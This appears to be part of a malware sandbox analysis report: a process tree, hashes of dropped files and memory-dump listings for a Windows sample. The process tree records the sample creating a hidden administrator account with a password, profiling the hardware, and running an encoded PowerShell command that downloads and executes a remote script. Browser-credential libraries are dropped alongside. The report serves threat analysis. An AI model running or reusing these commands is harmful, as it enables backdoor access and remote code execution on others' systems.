C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc b1mq90yo1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc b1mq90yo2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc b1mq90yo3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1MD5
b2207567c6a62b42655772770ce2a4e6
SHA151074ad655105f0c496f4017e8afee90d9cab900
SHA256d7b206f39b6f6996cb9472df9fa350ab9da7f1eca47f782c4e5d05ca338daaab
SHA51285d8eb5772d672b1e84b3f09048c207ed7ecaa7f68f14dc34baa34dd49ed0d674ff150eec20932e468a7a4d17d91d22caa639fe8d9bab0bed0105c4c38631bb5
-
C:\Users\Admin\AppData\Local\Temp\RES6B81.tmpMD5
ca9d23db702746a49e1df3d6ce982c5e
SHA161c2ca0bcb2e97f771481169fc6779cf1e74ac87
SHA2566f96911a006d702e5b2d449907d642388488b6564442f568d857b28dc0ddaa91
SHA512597a4682acdb02369e4734729c3ff990589362077281594481883929a61fbb97deb481f10c234b3f236dcd4e82dff7df0e7ba85761f068b7bb963883c36aa9a2
-
C:\Users\Admin\AppData\Local\Temp\XfkRrAZJGQ.exeMD5
aa80d5960e65ac46ad446c09c1a17608
SHA1c2468b1792e5ecef461d2d89470e8438c05cce24
SHA256857ddc8de567afa19f5bc9236f6cf3681e46919530f90acc25ff36112564432c
SHA51207e15d76dc1940e0b3a926cfa6a5d92760525ae7f9e54bc8c691f1c9ea8af71ffe818aa347857a5c1435316d152a262a1875f03f465bc7be36a10e73bab6022b
-
C:\Users\Admin\AppData\Local\Temp\XfkRrAZJGQ.exeMD5
aa80d5960e65ac46ad446c09c1a17608
SHA1c2468b1792e5ecef461d2d89470e8438c05cce24
SHA256857ddc8de567afa19f5bc9236f6cf3681e46919530f90acc25ff36112564432c
SHA51207e15d76dc1940e0b3a926cfa6a5d92760525ae7f9e54bc8c691f1c9ea8af71ffe818aa347857a5c1435316d152a262a1875f03f465bc7be36a10e73bab6022b
-
C:\Users\Admin\AppData\Local\Temp\jacslsk4\jacslsk4.dllMD5
0747cba4f0662e19da13aaea5bf55959
SHA16251a4f9b5cdfc5563df434750dc9c5ccf0a245d
SHA256af3975c39a3106880892764e01f96c222013945e9d9b702aea4c457c212b253c
SHA512dfcc7c82b8cee9ae37917aa8d1b23d4910624dd4a2df7ebc96b9ee30de821dbb24a4fc2f23dfb817db6cbf218c4e7466f47b1fd6df966753ff465350d0f1b9b2
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
065cc96fec70546c9f195f703e4d657b
SHA19da24636d8fd3de61f46ff7282640d3fa27d6b45
SHA256cc7097fa515dfc07033464b5e71ba0172f440bd4043ec1c7c48c6ce4f18e3bc3
SHA512a2fefe055067d832736c109d1ea50921bfc9275bb6fe11e57f4245cac52e1758b9b2d7fe893ece0fe5101b3cb5a1229011b8e517fe31de5202c4a7f0fa39aec0
-
\??\c:\Users\Admin\AppData\Local\Temp\jacslsk4\CSC78E3A215782F48DD9CB5172249BAE1F.TMPMD5
1ef255c8db1d97dabb6baa00b3e1cf56
SHA1c5521542375d1e4e6746fdd946c3a499b05f4fba
SHA25627979873d424e73d1f80c1265962162b48d3b2499b641b0bb0d66d9c4f80c313
SHA512caf57eaaa8bc4eee324ce9b17329ccd43fc4dc4479467d903e4ba96cb8bda79c655a0bb91e8905fe288ddf5088ad2aca386dcc1c5045d851556cb68444ebd5c4
-
\??\c:\Users\Admin\AppData\Local\Temp\jacslsk4\jacslsk4.0.csMD5
df390bc8a088b51d27253fed32186361
SHA169e6a59300fc04ef5ab53cbe061b8b2aefe375a4
SHA2564388b3b4aaccededcd9a2d864ba85967c08a4586dee2745e5539e12cb4de5c5f
SHA5124d0d050afd8809b9090e0ac8ab4f00ad4237723bfa8adb2f605fbbdd6be532bd941bccf79b7fbc0d226bc7890c2011dd18b0263af5b81911e1c8def2d9f235c8
-
\??\c:\Users\Admin\AppData\Local\Temp\jacslsk4\jacslsk4.cmdlineMD5
c53fd9dfcbeeafcf127aac8dcd5d475d
SHA1578a9d48f5ba7d4400ef43f397df4e907ae3d049
SHA25680ed73d3fabbbe6bc00778e45fb22c7cc2a1b8089d7a8bb735ddc68215a49e40
SHA512ab3144cb621b2320c83afb761ccc52360554d5770a2f2aaab4f2b778c95b08b5cfd7330dbfc01d37a3e68af2f59fa5a4b7c131fbdf950ac4fa76f0c8e356dfe7
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\freebl3.dllMD5
60acd24430204ad2dc7f148b8cfe9bdc
SHA1989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA2569876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\freebl3.dllMD5
60acd24430204ad2dc7f148b8cfe9bdc
SHA1989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA2569876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\mozglue.dllMD5
eae9273f8cdcf9321c6c37c244773139
SHA18378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA51206e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\nss3.dllMD5
02cc7b8ee30056d5912de54f1bdfc219
SHA1a6923da95705fb81e368ae48f93d28522ef552fb
SHA2561989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA5120d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\softokn3.dllMD5
4e8df049f3459fa94ab6ad387f3561ac
SHA106ed392bc29ad9d5fc05ee254c2625fd65925114
SHA25625a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
SHA5123dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6
-
\Users\Admin\AppData\LocalLow\sqlite3.dllMD5
f964811b68f9f1487c2b41e1aef576ce
SHA1b423959793f14b1416bc3b7051bed58a1034025f
SHA25683bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
-
\Windows\Branding\mediasrv.pngMD5
1da8e368cb917044f7440a54d79f6737
SHA1df60dd7011bc948f3b871b1a6cb149a7028c1a85
SHA256dce86185269e01eba9301b761ae9a002054713060e35dbc908d44ddd8e647bd4
SHA5128437463516b7da13a661d5acdadd8d52641464e797831e635d697aa863c2c01b3f15be67073d08f2d9361f639b4ee1eaf9a0c8b2811f3cd3d78c43e55651fa92
-
\Windows\Branding\mediasvc.pngMD5
009e8b6a916836a4a8aa2be3229276a1
SHA128f3892fb8b63e7299dce25cb65bf252e29d5afd
SHA25639ec650a006fc423825d552edf526443c96b5a027f58e6423e6344d90b228ab7
SHA512a47a29ce28659d2839d808a614d9537fdcefcc08509f5e0cab0c747ebb7f04453781647e475934b4db5e254127e8621cedab01efd425fb5af23cac8dfcf9d7dc
-
memory/744-251-0x0000000000000000-mapping.dmp
-
memory/744-227-0x0000000000000000-mapping.dmp
-
memory/744-241-0x0000000000000000-mapping.dmp
-
memory/752-230-0x0000000000000000-mapping.dmp
-
memory/796-238-0x0000000000000000-mapping.dmp
-
memory/1120-223-0x0000000000000000-mapping.dmp
-
memory/1120-259-0x0000000000000000-mapping.dmp
-
memory/1212-222-0x0000000000000000-mapping.dmp
-
memory/1380-126-0x0000000000000000-mapping.dmp
-
memory/1492-232-0x0000000000000000-mapping.dmp
-
memory/1588-249-0x0000000000000000-mapping.dmp
-
memory/1592-228-0x0000000000000000-mapping.dmp
-
memory/1772-243-0x0000000000000000-mapping.dmp
-
memory/2116-258-0x0000000000000000-mapping.dmp
-
memory/2148-239-0x0000000000000000-mapping.dmp
-
memory/2148-225-0x0000000000000000-mapping.dmp
-
memory/2152-127-0x000001A5716B0000-0x000001A571AD1000-memory.dmpFilesize
4.1MB
-
memory/2152-122-0x0000000000000000-mapping.dmp
-
memory/2152-130-0x000001A571273000-0x000001A571275000-memory.dmpFilesize
8KB
-
memory/2152-129-0x000001A571270000-0x000001A571272000-memory.dmpFilesize
8KB
-
memory/2152-132-0x000001A571276000-0x000001A571277000-memory.dmpFilesize
4KB
-
memory/2152-131-0x000001A571275000-0x000001A571276000-memory.dmpFilesize
4KB
-
memory/2284-233-0x0000000000000000-mapping.dmp
-
memory/2304-218-0x000001B77DBE0000-0x000001B77DBE2000-memory.dmpFilesize
8KB
-
memory/2304-220-0x000001B77DBE6000-0x000001B77DBE8000-memory.dmpFilesize
8KB
-
memory/2304-216-0x0000000000000000-mapping.dmp
-
memory/2304-219-0x000001B77DBE3000-0x000001B77DBE5000-memory.dmpFilesize
8KB
-
memory/2388-114-0x0000000000640000-0x00000000006D1000-memory.dmpFilesize
580KB
-
memory/2388-115-0x0000000000400000-0x0000000000496000-memory.dmpFilesize
600KB
-
memory/2396-234-0x0000000000000000-mapping.dmp
-
memory/2616-260-0x0000000000000000-mapping.dmp
-
memory/2624-257-0x0000000000000000-mapping.dmp
-
memory/2704-217-0x0000020C98EE6000-0x0000020C98EE8000-memory.dmpFilesize
8KB
-
memory/2704-212-0x0000000000000000-mapping.dmp
-
memory/2704-215-0x0000020C98EE3000-0x0000020C98EE5000-memory.dmpFilesize
8KB
-
memory/2704-214-0x0000020C98EE0000-0x0000020C98EE2000-memory.dmpFilesize
8KB
-
memory/2728-237-0x0000000000000000-mapping.dmp
-
memory/2752-240-0x0000000000000000-mapping.dmp
-
memory/2892-155-0x0000000000000000-mapping.dmp
-
memory/3152-229-0x0000000000000000-mapping.dmp
-
memory/3152-248-0x0000000000000000-mapping.dmp
-
memory/3324-247-0x0000000000000000-mapping.dmp
-
memory/3340-250-0x0000000000000000-mapping.dmp
-
memory/3532-256-0x0000027EFA778000-0x0000027EFA779000-memory.dmpFilesize
4KB
-
memory/3532-252-0x0000000000000000-mapping.dmp
-
memory/3532-253-0x0000027EFA770000-0x0000027EFA772000-memory.dmpFilesize
8KB
-
memory/3532-254-0x0000027EFA773000-0x0000027EFA775000-memory.dmpFilesize
8KB
-
memory/3532-255-0x0000027EFA776000-0x0000027EFA778000-memory.dmpFilesize
8KB
-
memory/3532-244-0x0000000000000000-mapping.dmp
-
memory/3548-231-0x0000000000000000-mapping.dmp
-
memory/3732-158-0x0000000000000000-mapping.dmp
-
memory/3748-191-0x000001997EA33000-0x000001997EA35000-memory.dmpFilesize
8KB
-
memory/3748-177-0x0000000000000000-mapping.dmp
-
memory/3748-210-0x000001997EA36000-0x000001997EA38000-memory.dmpFilesize
8KB
-
memory/3748-213-0x000001997EA38000-0x000001997EA3A000-memory.dmpFilesize
8KB
-
memory/3748-190-0x000001997EA30000-0x000001997EA32000-memory.dmpFilesize
8KB
-
memory/3764-245-0x0000000000000000-mapping.dmp
-
memory/3780-246-0x0000000000000000-mapping.dmp
-
memory/3784-226-0x0000000000000000-mapping.dmp
-
memory/3784-242-0x0000000000000000-mapping.dmp
-
memory/3820-149-0x000001E69FC23000-0x000001E69FC25000-memory.dmpFilesize
8KB
-
memory/3820-169-0x000001E6A0DA0000-0x000001E6A0DA1000-memory.dmpFilesize
4KB
-
memory/3820-133-0x0000000000000000-mapping.dmp
-
memory/3820-170-0x000001E6A1130000-0x000001E6A1131000-memory.dmpFilesize
4KB
-
memory/3820-162-0x000001E6A0950000-0x000001E6A0951000-memory.dmpFilesize
4KB
-
memory/3820-148-0x000001E69FC20000-0x000001E69FC22000-memory.dmpFilesize
8KB
-
memory/3820-139-0x000001E6A06F0000-0x000001E6A06F1000-memory.dmpFilesize
4KB
-
memory/3820-144-0x000001E6A09A0000-0x000001E6A09A1000-memory.dmpFilesize
4KB
-
memory/3820-164-0x000001E69FC26000-0x000001E69FC28000-memory.dmpFilesize
8KB
-
memory/3820-221-0x000001E69FC28000-0x000001E69FC29000-memory.dmpFilesize
4KB
-
memory/3952-125-0x0000000000000000-mapping.dmp
-
memory/4088-224-0x0000000000000000-mapping.dmp